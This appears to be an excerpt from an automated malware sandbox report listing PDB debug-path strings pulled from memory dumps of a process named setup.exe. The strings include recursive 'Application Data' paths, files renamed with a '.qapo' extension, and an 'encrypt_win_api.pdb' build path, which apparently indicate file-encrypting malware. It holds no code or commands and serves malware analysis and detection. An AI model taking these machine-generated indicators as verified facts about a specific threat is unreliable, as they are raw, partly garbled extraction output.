        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: setup.exe, 00000007.00000003.2626159468.000000000319B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2684914442.000000000319B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\a\ source: setup.exe, 00000007.00000003.2461993302.00000000035BD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: setup.exe, 00000007.00000003.2768965443.000000000398D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2768366694.000000000396F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2764452722.0000000003961000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: setup.exe, 00000007.00000003.2764644897.00000000039FD000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2764499764.00000000039D5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2742757792.0000000003A0F000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Comms\Unistore\data\.pdb^ source: setup.exe, 00000007.00000003.2723110611.0000000003751000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2724191836.000000000375B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2742307025.0000000003749000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\p\EU,n source: setup.exe, 00000007.00000003.2743065329.000000000358D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: setup.exe, 00000007.00000003.2710455878.0000000003948000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2724383296.0000000003969000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2724018230.0000000003950000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2723254796.0000000003949000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\* source: setup.exe, 00000007.00000003.2773335640.0000000003A34000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2774492589.0000000003A75000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2774727040.0000000003A76000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2773962244.0000000003A3D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\j source: setup.exe, 00000007.00000003.2724383296.00000000039BC000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2742372787.00000000039AC000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2723254796.00000000039BC000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2743615497.00000000039B5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*ory\^ source: setup.exe, 00000007.00000003.2626159468.00000000031BB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\C source: setup.exe, 00000007.00000003.2710234976.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2713175498.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2724534584.00000000035B3000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2722862475.00000000035A8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: setup.exe, 00000007.00000003.2710037424.0000000003620000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2723471760.0000000003640000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2713324414.000000000365F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2710681937.0000000003642000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2722862475.00000000035A8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: setup.exe, 00000007.00000003.2685656337.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625881641.000000000359D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2685189720.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2686393680.00000000035B5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2684541457.000000000358E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: setup.exe, 00000007.00000003.2785158322.0000000003AEE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\a0\\, source: setup.exe, 00000007.00000003.2785654234.00000000035C2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\# source: setup.exe, 00000007.00000003.2773242341.00000000039EC000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2772716906.00000000039EC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Se:O source: setup.exe, 00000007.00000003.2779194875.0000000003AFF000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2779024019.0000000003ABF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\* source: setup.exe, 00000007.00000003.2785158322.0000000003AEE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\eSync\ source: setup.exe, 00000007.00000003.2773335640.0000000003A34000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2774492589.0000000003A75000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2774727040.0000000003A76000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2773962244.0000000003A3D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: setup.exe, 00000007.00000003.2768838437.0000000003A6D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2768648555.0000000003A55000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.qapo source: setup.exe, 00000007.00000003.2626071304.0000000003640000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625931731.00000000035E2000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625667819.00000000035CA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: setup.exe, 00000007.00000003.2626071304.0000000003640000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2684541457.000000000358E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625931731.00000000035E2000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625667819.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2684849989.0000000003640000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: setup.exe, 00000007.00000003.2686703862.0000000003182000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2685008804.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2684970587.0000000003177000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2713267355.0000000003184000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2712424638.000000000316F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2710234976.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2684541457.000000000358E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2711719225.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2710870216.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2711232691.00000000035E2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\= source: setup.exe, 00000007.00000003.2768838437.0000000003A6D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2768648555.0000000003A55000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\\ source: setup.exe, 00000007.00000003.2772716906.00000000038F9000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2773658028.0000000003938000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2768366694.000000000396F000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2773794657.0000000003985000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\? source: setup.exe, 00000007.00000003.2743511663.0000000003763000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2723110611.0000000003751000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2724191836.000000000375B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2742307025.0000000003749000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\s\ source: setup.exe, 00000007.00000003.2764644897.00000000039FD000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2764499764.00000000039D5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: setup.exe, 00000007.00000003.2684970587.0000000003177000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2686044253.0000000003192000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2626657794.0000000003180000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\AC\ source: setup.exe, 00000007.00000003.2713457937.000000000316A000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2627156422.0000000003167000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2686510863.0000000003168000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2685316108.0000000003167000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ts\ source: setup.exe, 00000007.00000003.2779194875.0000000003AFF000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2779024019.0000000003ABF000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\6 source: setup.exe, 00000007.00000003.2723110611.0000000003751000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2724191836.000000000375B000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\4 source: setup.exe, 00000007.00000003.2712522294.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2710234976.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2713919458.00000000035BE000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2723719415.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2722862475.00000000035A8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: setup.exe, 00000007.00000003.2713731803.0000000003911000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2713597685.0000000003900000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e source: setup.exe, 00000007.00000003.2782379959.0000000003A86000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\$ source: setup.exe, 00000007.00000003.2685562013.00000000036E1000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2685409736.00000000036D0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: setup.exe, 00000007.00000003.2743351263.00000000036E5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: setup.exe, 00000007.00000003.2433244594.00000000035BC000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2432071490.00000000035AD000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2433575284.00000000035C8000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625667819.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2433415636.00000000035C2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: setup.exe, 00000007.00000003.2710234976.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2713823244.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2712968549.00000000035EA000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2724488182.00000000035EB000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2723856155.00000000035EA000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2723661326.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2710870216.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2711232691.00000000035E2000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2722862475.00000000035A8000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\yewy\ source: setup.exe, 00000007.00000003.2785762338.0000000003665000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\1 source: setup.exe, 00000007.00000003.2685562013.00000000036E1000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2685409736.00000000036D0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\BH source: setup.exe, 00000007.00000003.2764644897.00000000039FD000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2764499764.00000000039D5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2742757792.0000000003A0F000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: setup.exe, 00000007.00000003.2724383296.00000000039BC000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2742372787.00000000039AC000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2723254796.00000000039BC000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2743615497.00000000039B5000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: setup.exe, 00000007.00000003.2627156422.0000000003167000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2411613102.0000000003167000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2686510863.0000000003168000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2685316108.0000000003167000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\te\* source: setup.exe, 00000007.00000003.2773335640.0000000003A34000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\\ source: setup.exe, 00000007.00000003.2685656337.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625881641.000000000359D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2685189720.00000000035A7000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2686393680.00000000035B5000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2684541457.000000000358E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\reports\.pdb\kSf6 source: setup.exe, 00000007.00000003.2772716906.00000000039EC000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2773020133.00000000039FD000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\tory\] source: setup.exe, 00000007.00000003.2626159468.00000000031BB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.qapoqapoS source: setup.exe, 00000007.00000003.2626071304.0000000003640000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625931731.00000000035E2000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625667819.00000000035CA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbPd source: setup.exe, 00000007.00000003.2685008804.00000000035D6000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2626958901.00000000035EA000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2684541457.000000000358E000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625931731.00000000035E2000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625667819.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2685528048.0000000003620000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\kies\ source: setup.exe, 00000007.00000003.2626159468.00000000031BB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\e\* source: setup.exe, 00000007.00000003.2782580351.0000000003967000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error.qapo% source: setup.exe, 00000007.00000003.2626071304.0000000003640000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625931731.00000000035E2000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2625667819.00000000035CA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\,]:<U source: setup.exe, 00000007.00000003.2773335640.0000000003A34000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2774492589.0000000003A75000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2774727040.0000000003A76000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2768648555.0000000003A8A000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2773962244.0000000003A3D000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ome\m source: setup.exe, 00000007.00000003.2742372787.0000000003960000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2764452722.0000000003961000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\;.P"^ source: setup.exe, 00000007.00000003.2713731803.0000000003911000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2713597685.0000000003900000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2743570306.00000000038F1000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: setup.exe, setup.exe, 00000007.00000002.2789432788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, setup.exe, 0000000B.00000002.2245401585.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, setup.exe, 0000000C.00000002.2255626212.0000000000400000.00000040.00000400.00020000.00000000.sdmp, setup.exe, 00000010.00000002.2324184436.00000000020B0000.00000040.00001000.00020000.00000000.sdmp, setup.exe, 00000011.00000002.2337074777.0000000000400000.00000040.00000400.00020000.00000000.sdmp
        Source: Binary string: asers\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.qapo source: setup.exe, 00000007.00000003.2627156422.0000000003167000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\tory\/ source: setup.exe, 00000007.00000003.2626159468.00000000031BB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\tory\ source: setup.exe, 00000007.00000003.2626159468.00000000031BB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\E@ source: setup.exe, 00000007.00000003.2742372787.0000000003960000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2764452722.0000000003961000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: setup.exe, 00000007.00000003.2785654234.00000000035C2000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: setup.exe, 00000007.00000003.2785218646.0000000003A0C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\tory\! source: setup.exe, 00000007.00000003.2626159468.00000000031BB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: setup.exe, 00000007.00000003.2685562013.00000000036E1000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2685409736.00000000036D0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\21\} source: setup.exe, 00000007.00000003.2411613102.0000000003167000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ta\P source: setup.exe, 00000007.00000003.2712522294.00000000035B9000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2710234976.00000000035A8000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2713919458.00000000035BE000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2723719415.00000000035CA000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2722862475.00000000035A8000.00000004.00000020.00020000.00000000.sdmp
